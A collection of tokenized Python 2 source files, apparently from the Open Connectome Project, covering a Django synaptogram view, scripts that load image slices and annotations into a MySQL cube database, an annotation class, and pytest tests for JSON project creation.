<s> import django . http <EOL> import numpy as np <EOL> from PIL import Image <EOL> import urllib2 <EOL> import zlib <EOL> import cStringIO <EOL> import re <EOL> import ocpcaproj <EOL> import ocpcarest <EOL> import synaptogram <EOL> """<STR_LIT>""" <EOL> def synaptogram_view ( request , webargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> token , chanstr , centroidstr , rest = webargs . split ( '<STR_LIT:/>' , <NUM_LIT:3> ) <EOL> channels = chanstr . split ( '<STR_LIT:U+002C>' ) <EOL> centroid = map ( lambda x : int ( x ) , centroidstr . split ( '<STR_LIT:U+002C>' ) ) <EOL> sog = synaptogram . Synaptogram ( token , channels , centroid ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setReference ( s . group ( <NUM_LIT:1> ) . split ( '<STR_LIT:U+002C>' ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setEM ( s . group ( <NUM_LIT:1> ) . split ( '<STR_LIT:U+002C>' ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setEnhance ( float ( s . group ( <NUM_LIT:1> ) ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setNormalize ( ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setNormalize2 ( ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setResolution ( int ( s . group ( <NUM_LIT:1> ) ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setWidth ( int ( s . group ( <NUM_LIT:1> ) ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setTileWidth ( int ( s . group ( <NUM_LIT:1> ) ) ) <EOL> s = re . search ( '<STR_LIT>' , rest ) <EOL> if s != None : <EOL> sog . setFrameWidth ( int ( s . group ( <NUM_LIT:1> ) ) ) <EOL> sogimg = sog . construct ( ) <EOL> fobj = cStringIO . StringIO ( ) <EOL> sogimg . save ( fobj , "<STR_LIT>" ) <EOL> fobj . seek ( <NUM_LIT:0> ) <EOL> return django . http . HttpResponse ( fobj . read ( ) , mimetype = "<STR_LIT>" ) <EOL> except Exception , e : <EOL> raise </s>
<s> import argparse <EOL> import numpy as np <EOL> import urllib , urllib2 <EOL> import cStringIO <EOL> import sys <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT:filename>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , type = int , default = <NUM_LIT:0> ) <EOL> result = parser . parse_args ( ) <EOL> url = '<STR_LIT>' % ( result . baseurl , result . token , result . channel , result . resolution ) <EOL> print url <EOL> fh = open ( result . filename ) <EOL> try : <EOL> f = urllib2 . urlopen ( url , fh . read ( ) ) <EOL> except urllib2 . URLError , e : <EOL> print "<STR_LIT>" % ( url , e ) <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import argparse <EOL> import numpy as np <EOL> from PIL import Image <EOL> import ocppaths <EOL> import ocpcarest <EOL> import zindex <EOL> import anydbm <EOL> import multiprocessing <EOL> import pdb <EOL> """<STR_LIT>""" <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT:path>' , action = "<STR_LIT:store>" , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , help = '<STR_LIT>' ) <EOL> result = parser . parse_args ( ) <EOL> resolution = <NUM_LIT:0> <EOL> [ db , proj , projdb ] = ocpcarest . loadDBProj ( result . token ) <EOL> ( xcubedim , ycubedim , zcubedim ) = proj . datasetcfg . cubedim [ resolution ] <EOL> ( startslice , endslice ) = proj . datasetcfg . slicerange <EOL> batchsz = zcubedim <EOL> ximagesz = <NUM_LIT> <EOL> yimagesz = <NUM_LIT> <EOL> batchsz = <NUM_LIT:16> <EOL> totalslices = range ( startslice , endslice , <NUM_LIT:16> ) <EOL> totalprocs = int ( result . process ) <EOL> def parallelwrite ( slicenumber ) : <EOL> [ db , proj , projdb ] = ocpcarest . loadDBProj ( result . token ) <EOL> startslice = slicenumber <EOL> endslice = startslice + <NUM_LIT:16> <EOL> for sl in range ( startslice , endslice + <NUM_LIT:1> , batchsz ) : <EOL> slab = np . zeros ( [ batchsz , yimagesz , ximagesz ] , dtype = np . uint32 ) <EOL> for b in range ( batchsz ) : <EOL> if ( sl + b <= endslice and sl + b <= <NUM_LIT> ) : <EOL> filenm = result . path + '<STR_LIT>' + '<STR_LIT>' . format ( sl + b ) + '<STR_LIT>' <EOL> img = Image . open ( filenm , '<STR_LIT:r>' ) <EOL> imgdata = np . asarray ( img ) <EOL> anydb = anydbm . open ( '<STR_LIT>' , '<STR_LIT:r>' ) <EOL> superpixelarray = imgdata [ : , : , <NUM_LIT:0> ] + ( np . uint32 ( imgdata [ : , : , <NUM_LIT:1> ] ) << <NUM_LIT:8> ) <EOL> newdata = np . zeros ( [ superpixelarray . shape [ <NUM_LIT:0> ] , superpixelarray . shape [ <NUM_LIT:1> ] ] , dtype = np . uint32 ) <EOL> print sl + b , multiprocessing . current_process ( ) <EOL> for i in range ( superpixelarray . shape [ <NUM_LIT:0> ] ) : <EOL> for j in range ( superpixelarray . shape [ <NUM_LIT:1> ] ) : <EOL> key = str ( sl ) + '<STR_LIT:U+002C>' + str ( superpixelarray [ i , j ] ) <EOL> if ( key not in anydb ) : <EOL> f = open ( '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> f . write ( key + '<STR_LIT:\n>' ) <EOL> f . close ( ) <EOL> print "<STR_LIT>" <EOL> dictvalue = '<STR_LIT:0>' <EOL> else : <EOL> dictvalue = anydb . get ( key ) <EOL> newdata [ i , j ] = int ( dictvalue ) <EOL> slab [ b , : , : ] = newdata <EOL> print "<STR_LIT>" , sl + b <EOL> anydb . close ( ) <EOL> print "<STR_LIT>" <EOL> for y in range ( <NUM_LIT:0> , yimagesz , ycubedim ) : <EOL> for x in range ( <NUM_LIT:0> , ximagesz , xcubedim ) : <EOL> mortonidx = zindex . XYZMorton ( [ x / xcubedim , y / ycubedim , ( sl - startslice ) / zcubedim ] ) <EOL> cubedata = np . zeros ( [ zcubedim , ycubedim , xcubedim ] , dtype = np . uint32 ) <EOL> xmin = x <EOL> ymin = y <EOL> xmax = min ( ximagesz , x + xcubedim ) <EOL> ymax = min ( yimagesz , y + ycubedim ) <EOL> zmin = <NUM_LIT:0> <EOL> zmax = min ( sl + zcubedim , endslice + <NUM_LIT:1> ) <EOL> cubedata [ <NUM_LIT:0> : zmax - zmin , <NUM_LIT:0> : ymax - ymin , <NUM_LIT:0> : xmax - xmin ] = slab [ zmin : zmax , ymin : ymax , xmin : xmax ] <EOL> db . annotateDense ( ( x , y , sl - startslice ) , resolution , cubedata , '<STR_LIT:O>' ) <EOL> print "<STR_LIT>" % ( x , y , sl ) <EOL> db . conn . commit ( ) <EOL> return None <EOL> def run ( ) : <EOL> flypool = multiprocessing . Pool ( totalprocs ) <EOL> flypool . map ( parallelwrite , totalslices , <NUM_LIT:16> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run ( ) </s>
<s> import argparse <EOL> import cStringIO <EOL> import urllib2 <EOL> import sys <EOL> import zlib <EOL> import zindex <EOL> import MySQLdb <EOL> from PIL import Image <EOL> import empaths <EOL> import emcaproj <EOL> import emcadb <EOL> import dbconfig <EOL> import imagecube <EOL> import numpy as np <EOL> RESOLUTION = <NUM_LIT:0> <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT>' , type = int , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT:path>' , action = "<STR_LIT:store>" ) <EOL> parser . add_argument ( '<STR_LIT>' , type = int , action = "<STR_LIT:store>" ) <EOL> result = parser . parse_args ( ) <EOL> projdb = emcaproj . EMCAProjectsDB ( ) <EOL> proj = projdb . getProj ( result . token ) <EOL> dbcfg = dbconfig . switchDataset ( proj . getDataset ( ) ) <EOL> _ximgsz = None <EOL> _yimgsz = None <EOL> for sl in range ( result . numslices ) : <EOL> filenm = result . path + '<STR_LIT:/>' + '<STR_LIT>' . format ( sl ) + '<STR_LIT>' <EOL> print filenm <EOL> img = Image . open ( filenm , "<STR_LIT:r>" ) <EOL> if _ximgsz == None and _yimgsz == None : <EOL> _ximgsz , _yimgsz = img . size <EOL> imarray = np . zeros ( [ result . numslices , _yimgsz , _ximgsz ] , dtype = np . uint16 ) <EOL> else : <EOL> assert _ximgsz == img . size [ <NUM_LIT:0> ] and _yimgsz == img . size [ <NUM_LIT:1> ] <EOL> imarray [ sl , : , : ] = np . asarray ( img ) <EOL> xcubedim , ycubedim , zcubedim = dbcfg . cubedim [ <NUM_LIT:0> ] <EOL> xlimit = ( _ximgsz - <NUM_LIT:1> ) / xcubedim + <NUM_LIT:1> <EOL> ylimit = ( _yimgsz - <NUM_LIT:1> ) / ycubedim + <NUM_LIT:1> <EOL> zlimit = ( result . numslices - <NUM_LIT:1> ) / zcubedim + <NUM_LIT:1> <EOL> db = emcadb . EMCADB ( dbcfg , proj ) <EOL> cursor = db . conn . cursor ( ) <EOL> for z in range ( zlimit ) : <EOL> db . commit ( ) <EOL> for y in range ( ylimit ) : <EOL> for x in range ( xlimit ) : <EOL> zmin = z * zcubedim <EOL> zmax = min ( ( z + <NUM_LIT:1> ) * zcubedim , result . numslices ) <EOL> zmaxrel = ( ( zmax - <NUM_LIT:1> ) % zcubedim ) + <NUM_LIT:1> <EOL> ymin = y * ycubedim <EOL> ymax = min ( ( y + <NUM_LIT:1> ) * ycubedim , _yimgsz ) <EOL> ymaxrel = ( ( ymax - <NUM_LIT:1> ) % ycubedim ) + <NUM_LIT:1> <EOL> xmin = x * xcubedim <EOL> xmax = min ( ( x + <NUM_LIT:1> ) * xcubedim , _ximgsz ) <EOL> xmaxrel = ( ( xmax - <NUM_LIT:1> ) % xcubedim ) + <NUM_LIT:1> <EOL> key = zindex . XYZMorton ( [ x , y , z ] ) <EOL> cube = imagecube . ImageCube16 ( [ xcubedim , ycubedim , zcubedim ] ) <EOL> cube . data [ <NUM_LIT:0> : zmaxrel , <NUM_LIT:0> : ymaxrel , <NUM_LIT:0> : xmaxrel ] = imarray [ zmin : zmax , ymin : ymax , xmin : xmax ] <EOL> npz = cube . toNPZ ( ) <EOL> sql = "<STR_LIT>" + proj . getTable ( RESOLUTION ) + "<STR_LIT>" <EOL> print sql <EOL> try : <EOL> cursor . execute ( sql , ( result . channel , key , npz ) ) <EOL> except MySQLdb . Error , e : <EOL> raise ANNError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> db . conn . commit ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import numpy as np <EOL> import cStringIO <EOL> import MySQLdb <EOL> import sys <EOL> from collections import defaultdict <EOL> from ocpcaerror import OCPCAError <EOL> import logging <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> """<STR_LIT>""" <EOL> ANNO_ANNOTATION = <NUM_LIT:1> <EOL> ANNO_SYNAPSE = <NUM_LIT:2> <EOL> ANNO_SEED = <NUM_LIT:3> <EOL> ANNO_SEGMENT = <NUM_LIT:4> <EOL> ANNO_NEURON = <NUM_LIT:5> <EOL> ANNO_ORGANELLE = <NUM_LIT:6> <EOL> anno_dbtables = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> class BatchAnnotation : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , annodb ) : <EOL> """<STR_LIT>""" <EOL> self . annodb = annodb <EOL> self . annidList = [ ] <EOL> self . statusList = [ <NUM_LIT:0> ] <EOL> self . confidenceList = [ <NUM_LIT:0.0> ] <EOL> self . authorList = [ "<STR_LIT>" ] <EOL> self . kvpairs = defaultdict ( list ) <EOL> def setID ( self , db ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . annidList ) == <NUM_LIT:0> : <EOL> self . annidList . append ( db . nextID ( ) ) <EOL> else : <EOL> db . setBatchID ( self . annidList ) <EOL> def getField ( self , field ) : <EOL> """<STR_LIT>""" <EOL> if field == '<STR_LIT:status>' : <EOL> return self . statusList <EOL> elif field == '<STR_LIT>' : <EOL> return self . confidenceList <EOL> elif field == '<STR_LIT>' : <EOL> return self . authorList <EOL> elif self . kvpairs . get ( field ) : <EOL> return self . kvpairs [ field ] <EOL> else : <EOL> logger . warning ( "<STR_LIT>" % ( field ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( field ) ) <EOL> def setField ( self , field , value ) : <EOL> """<STR_LIT>""" <EOL> if field == '<STR_LIT:status>' : <EOL> self . statusList . append ( value ) <EOL> elif field == '<STR_LIT>' : <EOL> self . confidenceList . append ( value ) <EOL> elif field == '<STR_LIT>' : <EOL> self . authorList = ( value ) <EOL> else : <EOL> self . kvpairs [ field ] = value <EOL> def store ( self , cursor , annotype = ANNO_ANNOTATION ) : <EOL> """<STR_LIT>""" <EOL> sql = "<STR_LIT>" . format ( anno_dbtables [ '<STR_LIT>' ] ) <EOL> data = zip ( self . annidList , len ( self . annidList ) * [ annotype ] , self . confidenceList , self . statusList ) <EOL> try : <EOL> cursor . executemany ( sql , data ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> if self . author != "<STR_LIT>" : <EOL> self . kvpairs [ '<STR_LIT>' ] = self . author <EOL> if len ( self . kvpairs ) != <NUM_LIT:0> : <EOL> try : <EOL> kvclause = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT:(>' + str ( self . annid ) + '<STR_LIT>' + k + '<STR_LIT>' + v + '<STR_LIT>' for ( k , v ) in self . kvpairs . iteritems ( ) ] ) <EOL> except : <EOL> raise OCPCAError ( "<STR_LIT>" + kvclause ) <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , kvclause ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> def update ( self , cursor ) : <EOL> """<STR_LIT>""" <EOL> self . updateBase ( ANNO_ANNOTATION , cursor ) <EOL> def updateBase ( self , annotype , cursor ) : <EOL> """<STR_LIT>""" <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , annotype , self . confidence , self . status , self . annid ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> if self . author != "<STR_LIT>" : <EOL> self . kvpairs [ '<STR_LIT>' ] = self . author <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , self . annid ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> kvresult = cursor . fetchall ( ) <EOL> kvupdate = { } <EOL> for kv in kvresult : <EOL> if self . kvpairs . has_key ( kv [ <NUM_LIT:1> ] ) : <EOL> if self . kvpairs [ kv [ <NUM_LIT:1> ] ] != kv [ <NUM_LIT:2> ] : <EOL> kvupdate [ kv [ <NUM_LIT:1> ] ] = self . kvpairs [ kv [ <NUM_LIT:1> ] ] <EOL> del ( self . kvpairs [ kv [ <NUM_LIT:1> ] ] ) <EOL> if len ( kvupdate ) != <NUM_LIT:0> : <EOL> for ( k , v ) in kvupdate . iteritems ( ) : <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , v , self . annid , k ) <EOL> cursor . execute ( sql ) <EOL> if len ( self . kvpairs ) != <NUM_LIT:0> : <EOL> kvclause = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT:(>' + str ( self . annid ) + '<STR_LIT>' + k + '<STR_LIT>' + v + '<STR_LIT>' for ( k , v ) in self . kvpairs . iteritems ( ) ] ) <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , kvclause ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> def delete ( self , cursor ) : <EOL> """<STR_LIT>""" <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , self . annid ) <EOL> sql += "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , self . annid ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> def retrieve ( self , annid , cursor ) : <EOL> """<STR_LIT>""" <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , annid ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> ( self . annid , annotype , self . confidence , self . status ) = cursor . fetchone ( ) <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , annid ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> kvpairs = cursor . fetchall ( ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> for kv in kvpairs : <EOL> self . kvpairs [ kv [ <NUM_LIT:1> ] ] = kv [ <NUM_LIT:2> ] <EOL> if self . kvpairs . get ( '<STR_LIT>' ) : <EOL> self . author = self . kvpairs [ '<STR_LIT>' ] <EOL> del ( self . kvpairs [ '<STR_LIT>' ] ) <EOL> else : <EOL> self . author = "<STR_LIT>" <EOL> return annotype </s>
<s> import time <EOL> import os <EOL> def getTime ( filename , func , * args ) : <EOL> """<STR_LIT>""" <EOL> os . chdir ( '<STR_LIT>' ) <EOL> f = open ( filename , '<STR_LIT>' ) <EOL> starttime = time . time ( ) <EOL> returnvalue = func ( * args ) <EOL> endtime = time . time ( ) <EOL> f . write ( '<STR_LIT>' . format ( endtime - starttime ) ) <EOL> return returnvalue </s>
<s> import sys , os <EOL> import argparse <EOL> sys . path += [ os . path . abspath ( '<STR_LIT>' ) ] <EOL> import OCP . settings <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> from django . conf import settings <EOL> import django <EOL> django . setup ( ) <EOL> from OCP import celery_app <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , help = '<STR_LIT>' ) <EOL> result = parser . parse_args ( ) <EOL> res = celery_app . AsyncResult ( result . taskid ) <EOL> print res . state <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import os <EOL> import sys <EOL> import json <EOL> import tempfile <EOL> import pytest <EOL> import numpy as np <EOL> import random <EOL> sys . path += [ os . path . abspath ( '<STR_LIT>' ) ] <EOL> import OCP . settings <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> from ocptype import IMAGE , UINT8 <EOL> from params import Params <EOL> from jsonproj import createJson <EOL> from postmethods import getURL , postURL , postNPZ , getNPZ <EOL> import makeunitdb <EOL> import site_to_test <EOL> SITE_HOST = site_to_test . site <EOL> p = Params ( ) <EOL> p . token = '<STR_LIT>' <EOL> p . resolution = <NUM_LIT:0> <EOL> p . channels = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> p . channel_type = IMAGE <EOL> p . datatype = UINT8 <EOL> p . dataset = '<STR_LIT>' <EOL> class Test_Project_Json ( ) : <EOL> def setup_class ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def teardown_class ( self ) : <EOL> """<STR_LIT>""" <EOL> makeunitdb . deleteTestDBList ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_basic_json ( self ) : <EOL> """<STR_LIT>""" <EOL> dataset = ( p . dataset , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ] , [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] , None , None , None , None ) <EOL> project = ( p . token , None , None ) <EOL> channels = { p . channels [ <NUM_LIT:0> ] : ( p . channels [ <NUM_LIT:0> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None , None , None ) } <EOL> metadata = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( createJson ( dataset , project , channels , metadata = metadata ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> f = getURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) ) <EOL> proj_info = json . loads ( f . read ( ) ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] == p . token ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:1> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] == <NUM_LIT:0> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] == p . datatype ) <EOL> try : <EOL> assert ( proj_info [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> except KeyError : <EOL> print "<STR_LIT>" <EOL> except AssertionError : <EOL> print "<STR_LIT>" <EOL> def test_complex_json ( self ) : <EOL> """<STR_LIT>""" <EOL> p . token = '<STR_LIT>' <EOL> dataset = ( p . dataset , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ] , [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , None , None , None ) <EOL> project = ( p . token , None , None ) <EOL> channels = { p . channels [ <NUM_LIT:1> ] : ( p . channels [ <NUM_LIT:1> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None , None , None ) } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( createJson ( dataset , project , channels ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> f = getURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) ) <EOL> proj_info = json . loads ( f . read ( ) ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] == p . token ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:1> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:1> ] ] [ '<STR_LIT>' ] == <NUM_LIT:0> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:1> ] ] [ '<STR_LIT>' ] == p . datatype ) <EOL> def test_error_json ( self ) : <EOL> """<STR_LIT>""" <EOL> dataset = ( p . dataset , [ <NUM_LIT:1000> , <NUM_LIT> , <NUM_LIT:1000> ] , [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , None , None , None ) <EOL> project = ( p . token , None , None ) <EOL> channels = { p . channels [ <NUM_LIT:1> ] : ( p . channels [ <NUM_LIT:1> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , None , None , None , None ) } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( createJson ( dataset , project , channels ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> class Test_Create_Channel_Json ( ) : <EOL> def setup_class ( self ) : <EOL> """<STR_LIT>""" <EOL> p . channels = [ ] <EOL> makeunitdb . createTestDB ( p . token , channel_list = p . channels , ximagesize = <NUM_LIT> , yimagesize = <NUM_LIT> , zimagesize = <NUM_LIT:1000> , xvoxelres = <NUM_LIT:1.0> , yvoxelres = <NUM_LIT:1.0> , zvoxelres = <NUM_LIT> ) <EOL> def teardown_class ( self ) : <EOL> """<STR_LIT>""" <EOL> makeunitdb . deleteTestDB ( p . token ) <EOL> def test_create_json ( self ) : <EOL> """<STR_LIT>""" <EOL> p . channels = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> dataset = ( p . dataset , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1000> ] , [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] , None , None , None , None ) <EOL> project = ( p . token , None , None ) <EOL> channels = { p . channels [ <NUM_LIT:0> ] : ( p . channels [ <NUM_LIT:0> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None , None , <NUM_LIT:0> ) , p . channels [ <NUM_LIT:1> ] : ( p . channels [ <NUM_LIT:1> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None , None , <NUM_LIT:0> ) , } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( createJson ( dataset , project , channels , channel_only = True ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> f = getURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) ) <EOL> proj_info = json . loads ( f . read ( ) ) <EOL> 